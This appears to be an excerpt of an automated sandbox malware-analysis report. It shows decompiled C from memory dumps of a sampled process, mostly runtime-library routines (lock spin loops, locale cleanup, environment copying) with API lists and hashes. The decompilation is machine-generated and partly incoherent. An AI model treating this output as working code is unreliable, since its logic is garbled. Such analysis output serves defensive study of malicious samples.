													_t70 = L009FF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L00A43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L009FF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L00A43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L009FF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L00A43915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00A25329(_t110, _t138);
																_t69 = E00A253A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                          0x00a4055a
                                                          0x00a4055d
                                                          0x00a40563
                                                          0x00a40566
                                                          0x00a405d8
                                                          0x00a405e2
                                                          0x00a405e5
                                                          0x00000000
                                                          0x00a405e7
                                                          0x00a405e7
                                                          0x00a405ea
                                                          0x00a405f3
                                                          0x00a405f3
                                                          0x00a40568
                                                          0x00a40568
                                                          0x00a40568
                                                          0x00a40569
                                                          0x00a40569
                                                          0x00a40569
                                                          0x00a4056b
                                                          0x00000000
                                                          0x00000000
                                                          0x00a6217f
                                                          0x00a62183
                                                          0x00a6225b
                                                          0x00a6225f
                                                          0x00a62189
                                                          0x00a6218c
                                                          0x00a6218f
                                                          0x00a62194
                                                          0x00a62199
                                                          0x00a6219d
                                                          0x00a621a0
                                                          0x00a621a2
                                                          0x00a621ce
                                                          0x00a621ce
                                                          0x00a621ce
                                                          0x00a621d0
                                                          0x00a621d6
                                                          0x00a621de
                                                          0x00a621e2
                                                          0x00a621e8
                                                          0x00a621e9
                                                          0x00a621ec
                                                          0x00a621f1
                                                          0x00a621f6
                                                          0x00000000
                                                          0x00000000
                                                          0x00a621f8
                                                          0x00a621fb
                                                          0x00a62206
                                                          0x00a6220b
                                                          0x00a6220c
                                                          0x00a62217
                                                          0x00a62226
                                                          0x00a6222b
                                                          0x00a6222c
                                                          0x00a6222f
                                                          0x00a62232
                                                          0x00a62235
                                                          0x00a62235
                                                          0x00a6223a
                                                          0x00a6223f
                                                          0x00a62241
                                                          0x00a62243
                                                          0x00a62248
                                                          0x00a62248
                                                          0x00a6224d
                                                          0x00a6224f
                                                          0x00a62262
                                                          0x00a62263
                                                          0x00a62268
                                                          0x00a62269
                                                          0x00a62269
                                                          0x00a62269
                                                          0x00a6226d
                                                          0x00000000
                                                          0x00000000
                                                          0x00a62276
                                                          0x00a62279
                                                          0x00a6227e
                                                          0x00a62283
                                                          0x00a62287
                                                          0x00a6228a
                                                          0x00a6228d
                                                          0x00a6228f
                                                          0x00a622bc
                                                          0x00a622bc
                                                          0x00a622bc
                                                          0x00a622be
                                                          0x00a622c4
                                                          0x00a622cc
                                                          0x00a622d0
                                                          0x00a622d6
                                                          0x00a622d7
                                                          0x00a622da
                                                          0x00a622df
                                                          0x00a622e4
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622e6
                                                          0x00a622e9
                                                          0x00a622f4
                                                          0x00a622f9
                                                          0x00a622fa
                                                          0x00a62305
                                                          0x00a62314
                                                          0x00a62319
                                                          0x00a6231a
                                                          0x00a6231d
                                                          0x00a62320
                                                          0x00a62323
                                                          0x00a62323
                                                          0x00a62328
                                                          0x00a6232d
                                                          0x00a6232f
                                                          0x00a62331
                                                          0x00a62336
                                                          0x00a62336
                                                          0x00a6233b
                                                          0x00a6233d
                                                          0x00a62350
                                                          0x00a62351
                                                          0x00a62356
                                                          0x00a62359
                                                          0x00a62359
                                                          0x00a6235b
                                                          0x00a6235d
                                                          0x00a25367
                                                          0x00a2536b
                                                          0x00a25372
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a62363
                                                          0x00a62363
                                                          0x00a62369
                                                          0x00a6236a
                                                          0x00a6236c
                                                          0x00a62371
                                                          0x00a62373
                                                          0x00000000
                                                          0x00a62379
                                                          0x00a62379
                                                          0x00a6237a
                                                          0x00a6237f
                                                          0x00a6237f
                                                          0x00a62385
                                                          0x00a62386
                                                          0x00a62389
                                                          0x00a6238e
                                                          0x00a62390
                                                          0x00a25378
                                                          0x00a2537c
                                                          0x00a62396
                                                          0x00a62396
                                                          0x00a62397
                                                          0x00a6239c
                                                          0x00a623a2
                                                          0x00a623a3
                                                          0x00a623a6
                                                          0x00a623ab
                                                          0x00a623ad
                                                          0x00000000
                                                          0x00a623b3
                                                          0x00a623b3
                                                          0x00a623b4
                                                          0x00a623b9
                                                          0x00a623ba
                                                          0x00a623ba
                                                          0x00a623bc
                                                          0x00a623bf
                                                          0x00000000
                                                          0x00000000
                                                          0x00a59153
                                                          0x00a59158
                                                          0x00a5915a
                                                          0x00a5915e
                                                          0x00a59160
                                                          0x00000000
                                                          0x00a59166
                                                          0x00a59166
                                                          0x00a59171
                                                          0x00a59176
                                                          0x00a59176
                                                          0x00000000
                                                          0x00a59160
                                                          0x00a623c6
                                                          0x00a623ce
                                                          0x00a623d7
                                                          0x00a623d7
                                                          0x00a623ad
                                                          0x00a62390
                                                          0x00a62373
                                                          0x00a6233f
                                                          0x00a6233f
                                                          0x00000000
                                                          0x00a6233f
                                                          0x00a62291
                                                          0x00a62291
                                                          0x00a62293
                                                          0x00a62295
                                                          0x00a6229a
                                                          0x00a622a1
                                                          0x00a622a3
                                                          0x00a622a7
                                                          0x00a622a9
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622ab
                                                          0x00a622ad
                                                          0x00a622af
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622af
                                                          0x00a622b1
                                                          0x00a622b4
                                                          0x00a622b4
                                                          0x00a622b6
                                                          0x00a253be
                                                          0x00a253be
                                                          0x00a253be
                                                          0x00a253c0
                                                          0x00000000
                                                          0x00000000
                                                          0x00a253cb
                                                          0x00a253ce
                                                          0x00a253d0
                                                          0x00a253d4
                                                          0x00a253d6
                                                          0x00000000
                                                          0x00a253d8
                                                          0x00a253e3
                                                          0x00a253ea
                                                          0x00a253ea
                                                          0x00000000
                                                          0x00a253d6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622b6
                                                          0x00000000
                                                          0x00a6228f
                                                          0x00a62349
                                                          0x00a6234d
                                                          0x00a62251
                                                          0x00a62251
                                                          0x00000000
                                                          0x00a62251
                                                          0x00a621a4
                                                          0x00a621a4
                                                          0x00a621a6
                                                          0x00a621a8
                                                          0x00a621ac
                                                          0x00a621b6
                                                          0x00a621b8
                                                          0x00a621bc
                                                          0x00a621be
                                                          0x00000000
                                                          0x00000000
                                                          0x00a621c0
                                                          0x00a621c2
                                                          0x00a621c4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a621c4
                                                          0x00a621c6
                                                          0x00a621c6
                                                          0x00a621c8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a621c8
                                                          0x00a621a2
                                                          0x00000000
                                                          0x00a62183
                                                          0x00a4057b
                                                          0x00a4057d
                                                          0x00a40581
                                                          0x00a40583
                                                          0x00a62178
                                                          0x00000000
                                                          0x00a40589
                                                          0x00a4058f
                                                          0x00a4058f
                                                          0x00a40583
                                                          0x00000000

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A62206
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-4236105082
                                                          • Opcode ID: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                          • Instruction ID: f510b12933ad2fa97dbec47dec43746e63c9951263ebfc88f77ee9bb51981f30
                                                          • Opcode Fuzzy Hash: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                          • Instruction Fuzzy Hash: EE513776B046016BEB148B28CC81FA633B9AFD8721F218229FD19DF285DA71EC458790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A5649 Relevance: 10.6, APIs: 7, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E009A5649(intOrPtr* __eax, short __ebx, void* __ecx, void* __edx, intOrPtr* __esi) {
				void* _t45;
				signed int _t47;
				intOrPtr* _t51;
				void* _t59;
				signed short _t60;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t71;
				void* _t78;
				void* _t80;
				void* _t95;
				intOrPtr* _t98;
				void* _t99;
				signed int _t100;
				void* _t102;
				void* _t103;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t123;

				_t97 = __esi;
				_t93 = __edx;
				_t79 = __ebx;
				asm("adc eax, [ecx+0x682af3]");
				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
				 *__eax =  *__eax + __eax;
				_t103 = _t102 + 0xc;
				if(__eax == 0) {
					if(E009BA06A(__esi) == 0) {
						if(E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, __ebx, E009B5609(__ebx) + 1) != 0) {
							goto L28;
						} else {
							goto L2;
						}
					} else {
						_t59 = E009B9FDB(__esi, 0x20001004, _t100 - 0x1dc, 2);
						_t106 = _t103 + 0x10;
						if(_t59 == 0) {
							L11:
							_t60 = GetACP();
							 *(_t100 - 0x1dc) = _t60;
						} else {
							_t60 =  *(_t100 - 0x1dc);
							if(_t60 == 0) {
								goto L11;
							}
						}
						 *_t94 = _t60 & 0x0000ffff;
						_t94 =  *((intOrPtr*)(_t100 - 0x1e4)) + 1;
						_t62 = E009B5727( *((intOrPtr*)(_t100 - 0x1d4)), 0x83, _t97,  *((intOrPtr*)(_t100 - 0x1e4)) + 1);
						_t107 = _t106 + 0x10;
						if(_t62 != 0) {
							goto L28;
						} else {
							_t63 = E009B5727(_t79,  *((intOrPtr*)(_t100 + 0x18)), _t97, _t94);
							_t108 = _t107 + 0x10;
							if(_t63 != 0) {
								goto L28;
							} else {
								_t64 = E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, _t97, _t94);
								_t109 = _t108 + 0x10;
								if(_t64 != 0) {
									goto L28;
								} else {
									_t94 = 0x83;
									goto L16;
								}
							}
						}
					}
				} else {
					_t94 = 0x83;
					_push(_t100 - 0x1d0);
					E009B7294(__ebx, __ecx, __edx, 0x83, _t123,  *((intOrPtr*)(_t100 - 0x1d4)), 0x83);
					_t109 = _t103 + 0xc;
					if(__ebx == 0) {
						L16:
						_t79 = 0;
						if( *_t97 == 0) {
							L20:
							 *((short*)( *((intOrPtr*)(_t100 - 0x1e0)))) = 0;
							goto L21;
						} else {
							_t69 =  *((intOrPtr*)(_t100 - 0x1e4));
							if( *((intOrPtr*)(_t100 - 0x1e4)) >= _t94) {
								goto L20;
							} else {
								_t71 = E009B5727( *((intOrPtr*)(_t100 - 0x1e0)), _t94, _t97, _t69 + 1);
								_t109 = _t109 + 0x10;
								if(_t71 == 0) {
									L21:
									_t94 =  *(_t100 - 0x1f0);
									if(_t94 != 0) {
										E009B32E0(_t94,  *((intOrPtr*)(_t100 - 0x1d8)), 4);
										_t109 = _t109 + 0xc;
									}
									_t79 =  *((intOrPtr*)(_t100 - 0x1d4));
									_t97 =  *((intOrPtr*)(_t100 - 0x1ec));
									if(E009B55AD( *((intOrPtr*)(_t100 - 0x1ec)),  *((intOrPtr*)(_t100 + 0x10)),  *((intOrPtr*)(_t100 - 0x1d4))) != 0) {
										goto L28;
									} else {
										L2:
										_pop(_t95);
										_pop(_t99);
										_pop(_t80);
										return E009B1E0D(_t80,  *(_t100 - 4) ^ _t100, _t93, _t95, _t99);
									}
								} else {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									goto L29;
								}
							}
						}
					} else {
						_t78 = E009B5727(__ebx,  *((intOrPtr*)(_t100 + 0x18)), _t100 - 0xb0, E009B5609(_t100 - 0xb0) + 1);
						_t109 = _t109 + 0x14;
						if(_t78 == 0) {
							goto L16;
						} else {
							L28:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							L29:
							E009AEB49(_t79, _t93);
							asm("int3");
							_push(8);
							_push(0x9cc538);
							_t45 = E009AF1E0(_t79, _t94, _t97);
							_t98 =  *((intOrPtr*)(_t100 + 8));
							if(_t98 != 0) {
								_t47 = E009B20A9(0xd);
								 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
								if( *((intOrPtr*)(_t98 + 4)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t47 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t98 + 4)) != 0x9ceac8) {
										E009B2248( *((intOrPtr*)(_t98 + 4)));
									}
								}
								 *(_t100 - 4) = 0xfffffffe;
								E009B78AF();
								if( *_t98 != 0) {
									E009B20A9(0xc);
									 *(_t100 - 4) = 1;
									E009B4248( *_t98);
									_t51 =  *_t98;
									if(_t51 != 0 &&  *_t51 == 0 && _t51 != 0x9ce800) {
										E009B40EE(_t51);
									}
									 *(_t100 - 4) = 0xfffffffe;
									E009B78BB();
								}
								_t45 = E009B2248(_t98);
							}
							return E009AF225(_t45);
						}
					}
				}
			}

























                                                          0x009a5649
                                                          0x009a5649
                                                          0x009a5649
                                                          0x009a5649
                                                          0x009a564f
                                                          0x009a5655
                                                          0x009a565b
                                                          0x009b7661
                                                          0x009b766a
                                                          0x009b766f
                                                          0x009b76d1
                                                          0x009b77f9
                                                          0x00000000
                                                          0x009b77fb
                                                          0x00000000
                                                          0x009b7579
                                                          0x009b76d7
                                                          0x009b76e6
                                                          0x009b76eb
                                                          0x009b76f0
                                                          0x009b76fc
                                                          0x009b76fc
                                                          0x009b7702
                                                          0x009b76f2
                                                          0x009b76f2
                                                          0x009b76fa
                                                          0x00000000
                                                          0x00000000
                                                          0x009b76fa
                                                          0x009b770b
                                                          0x009b7713
                                                          0x009b7721
                                                          0x009b7726
                                                          0x009b772b
                                                          0x00000000
                                                          0x009b7731
                                                          0x009b7737
                                                          0x009b773c
                                                          0x009b7741
                                                          0x00000000
                                                          0x009b7747
                                                          0x009b7751
                                                          0x009b7756
                                                          0x009b775b
                                                          0x00000000
                                                          0x009b7761
                                                          0x009b7761
                                                          0x00000000
                                                          0x009b7761
                                                          0x009b775b
                                                          0x009b7741
                                                          0x009b772b
                                                          0x009b7671
                                                          0x009b7677
                                                          0x009b767c
                                                          0x009b7684
                                                          0x009b7689
                                                          0x009b768e
                                                          0x009b7766
                                                          0x009b7766
                                                          0x009b776b
                                                          0x009b7794
                                                          0x009b779c
                                                          0x00000000
                                                          0x009b776d
                                                          0x009b776d
                                                          0x009b7775
                                                          0x00000000
                                                          0x009b7777
                                                          0x009b7781
                                                          0x009b7786
                                                          0x009b778b
                                                          0x009b779f
                                                          0x009b779f
                                                          0x009b77a7
                                                          0x009b77b2
                                                          0x009b77b7
                                                          0x009b77b7
                                                          0x009b77ba
                                                          0x009b77c0
                                                          0x009b77d5
                                                          0x00000000
                                                          0x009b77d7
                                                          0x009b757b
                                                          0x009b757e
                                                          0x009b757f
                                                          0x009b7582
                                                          0x009b758b
                                                          0x009b758b
                                                          0x009b778d
                                                          0x009b778d
                                                          0x009b778e
                                                          0x009b778f
                                                          0x009b7790
                                                          0x009b7791
                                                          0x00000000
                                                          0x009b7791
                                                          0x009b778b
                                                          0x009b7775
                                                          0x009b7694
                                                          0x009b76ad
                                                          0x009b76b2
                                                          0x009b76b7
                                                          0x00000000
                                                          0x009b76bd
                                                          0x009b7800
                                                          0x009b7802
                                                          0x009b7803
                                                          0x009b7804
                                                          0x009b7805
                                                          0x009b7806
                                                          0x009b7807
                                                          0x009b7807
                                                          0x009b780c
                                                          0x009b780d
                                                          0x009b780f
                                                          0x009b7814
                                                          0x009b7819
                                                          0x009b781e
                                                          0x009b7826
                                                          0x009b782c
                                                          0x009b7835
                                                          0x009b783a
                                                          0x009b783e
                                                          0x009b784c
                                                          0x009b7851
                                                          0x009b783e
                                                          0x009b7852
                                                          0x009b7859
                                                          0x009b7861
                                                          0x009b7865
                                                          0x009b786b
                                                          0x009b7874
                                                          0x009b787a
                                                          0x009b787e
                                                          0x009b788d
                                                          0x009b7892
                                                          0x009b7893
                                                          0x009b789a
                                                          0x009b789a
                                                          0x009b78a0
                                                          0x009b78a5
                                                          0x009b78ab
                                                          0x009b78ab
                                                          0x009b76b7
                                                          0x009b768e

                                                          APIs
                                                          • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 009B76FC
                                                          • _memmove.LIBCMT ref: 009B77B2
                                                          • __invoke_watson.LIBCMT ref: 009B7807
                                                          • __lock.LIBCMT ref: 009B7826
                                                          • _free.LIBCMT ref: 009B784C
                                                          • __lock.LIBCMT ref: 009B7865
                                                          • ___removelocaleref.LIBCMT ref: 009B7874
                                                          • ___freetlocinfo.LIBCMT ref: 009B788D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4124
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4142
                                                            • Part of subcall function 009B40EE: ___free_lconv_num.LIBCMT ref: 009B414D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4157
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4162
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4183
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4196
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41A4
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41AF
                                                            • Part of subcall function 009B40EE: ___free_lc_time.LIBCMT ref: 009B41CD
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41D8
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4203
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B420A
                                                          • _free.LIBCMT ref: 009B78A0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__lock$___free_lc_time___free_lconv_num___freetlocinfo___removelocaleref__invoke_watson_memmove
                                                          • String ID:
                                                          • API String ID: 936943993-0
                                                          • Opcode ID: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction ID: dae69ce64a2128626101bf60fecb98a9483d1b887915a57213a6b28aead9c9f5
                                                          • Opcode Fuzzy Hash: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction Fuzzy Hash: 41210971509304ABDB34ABE08F8ABE9B768AFC0330F58076DF415D6092DB35CA40C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B12B6 Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E009B12B6(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _t14;
				signed int _t15;
				signed int _t18;
				void* _t20;
				void* _t21;
				signed short* _t22;
				signed int _t23;
				void* _t24;
				void* _t30;
				signed short* _t32;
				signed int _t34;
				void* _t35;
				signed short* _t49;
				signed int _t50;
				signed short* _t53;
				signed short* _t56;
				void* _t60;

				_t47 = __edx;
				if(_a4 != 0) {
					_push(_a24);
					_push(_a20);
					_push(_a16);
					_push(_a12);
					_push(_a8);
					_t14 = E009AEB49(__ebx, __edx);
					asm("int3");
					_push(__ebx);
					_push(__esi);
					_t53 =  *0x9cf1e4; // 0x0
					_t32 = 0;
					_push(__edi);
					_t49 = 0;
					if(_t53 != 0) {
						while(1) {
							_t15 =  *_t53 & 0x0000ffff;
							_t35 = 0x3d;
							if(_t15 == 0) {
								break;
							}
							if(_t15 != _t35) {
								_t49 = _t49 + 1;
							}
							_t53 =  &(( &(_t53[E009B5609(_t53)]))[1]);
						}
						_t9 = _t49 + 1; // 0x1
						_t14 = E009B2280(_t9, 4);
						_t50 = _t14;
						 *0x9cf20c = _t50;
						if(_t50 == 0) {
							goto L4;
						} else {
							_t56 =  *0x9cf1e4; // 0x0
							if( *_t56 == _t32) {
								L17:
								E009B2248(_t56);
								 *0x9cf1e4 = _t32;
								_t18 = 0;
								 *_t50 = _t32;
								 *0x9d0118 = 1;
								goto L18;
							} else {
								do {
									_t20 = E009B5609(_t56);
									_t10 = _t20 + 1; // 0x1
									_t34 = _t10;
									_t21 = 0x3d;
									if( *_t56 == _t21) {
										goto L15;
									} else {
										_t22 = E009B2280(_t34, 2);
										 *_t50 = _t22;
										if(_t22 == 0) {
											_t23 = E009B2248( *0x9cf20c);
											 *0x9cf20c =  *0x9cf20c & 0x00000000;
											_t18 = _t23 | 0xffffffff;
											L18:
											goto L19;
										} else {
											_t24 = E009B55AD(_t22, _t34, _t56);
											_t60 = _t60 + 0xc;
											if(_t24 != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E009AEB49(_t34, _t47);
												asm("int3");
												if(E009B15DF(3) == 1) {
													L25:
													E009B1415(_t34, _t47, _t50, _t56, 0xfc);
													return E009B1415(_t34, _t47, _t50, _t56, 0xff);
												}
												_t30 = E009B15DF(3);
												if(_t30 == 0 &&  *0x9cf540 == 1) {
													goto L25;
												}
												return _t30;
											} else {
												_t50 = _t50 + 4;
												goto L15;
											}
										}
									}
									goto L27;
									L15:
									_t56 =  &(_t56[_t34]);
									_t32 = 0;
								} while ( *_t56 != 0);
								_t56 =  *0x9cf1e4; // 0x0
								goto L17;
							}
						}
					} else {
						L4:
						_t18 = _t14 | 0xffffffff;
						L19:
						return _t18;
					}
				} else {
					return __eax;
				}
				L27:
			}




















                                                          0x009b12b6
                                                          0x009b12bd
                                                          0x009b12c1
                                                          0x009b12c4
                                                          0x009b12c7
                                                          0x009b12ca
                                                          0x009b12cd
                                                          0x009b12d0
                                                          0x009b12d5
                                                          0x009b12d6
                                                          0x009b12d7
                                                          0x009b12d8
                                                          0x009b12de
                                                          0x009b12e0
                                                          0x009b12e1
                                                          0x009b12e5
                                                          0x009b1302
                                                          0x009b1302
                                                          0x009b1307
                                                          0x009b130b
                                                          0x00000000
                                                          0x00000000
                                                          0x009b12f2
                                                          0x009b12f4
                                                          0x009b12f4
                                                          0x009b12ff
                                                          0x009b12ff
                                                          0x009b130d
                                                          0x009b1313
                                                          0x009b1318
                                                          0x009b131a
                                                          0x009b1324
                                                          0x00000000
                                                          0x009b1326
                                                          0x009b1326
                                                          0x009b132f
                                                          0x009b1375
                                                          0x009b1376
                                                          0x009b137b
                                                          0x009b1381
                                                          0x009b1383
                                                          0x009b1385
                                                          0x00000000
                                                          0x009b1331
                                                          0x009b1331
                                                          0x009b1332
                                                          0x009b133a
                                                          0x009b133a
                                                          0x009b133d
                                                          0x009b1341
                                                          0x00000000
                                                          0x009b1343
                                                          0x009b1346
                                                          0x009b134b
                                                          0x009b1351
                                                          0x009b139a
                                                          0x009b139f
                                                          0x009b13a6
                                                          0x009b138f
                                                          0x00000000
                                                          0x009b1353
                                                          0x009b1356
                                                          0x009b135b
                                                          0x009b1360
                                                          0x009b13ad
                                                          0x009b13ae
                                                          0x009b13af
                                                          0x009b13b0
                                                          0x009b13b1
                                                          0x009b13b2
                                                          0x009b13b7
                                                          0x009b13c3
                                                          0x009b13da
                                                          0x009b13df
                                                          0x00000000
                                                          0x009b13ef
                                                          0x009b13c7
                                                          0x009b13cf
                                                          0x00000000
                                                          0x00000000
                                                          0x009b13f0
                                                          0x009b1362
                                                          0x009b1362
                                                          0x00000000
                                                          0x009b1362
                                                          0x009b1360
                                                          0x009b1351
                                                          0x00000000
                                                          0x009b1365
                                                          0x009b1365
                                                          0x009b1368
                                                          0x009b136a
                                                          0x009b136f
                                                          0x00000000
                                                          0x009b136f
                                                          0x009b132f
                                                          0x009b12e7
                                                          0x009b12e7
                                                          0x009b12e7
                                                          0x009b1390
                                                          0x009b1393
                                                          0x009b1393
                                                          0x009b12bf
                                                          0x009b12c0
                                                          0x009b12c0
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __invoke_watson
                                                          • String ID:
                                                          • API String ID: 3648217671-0
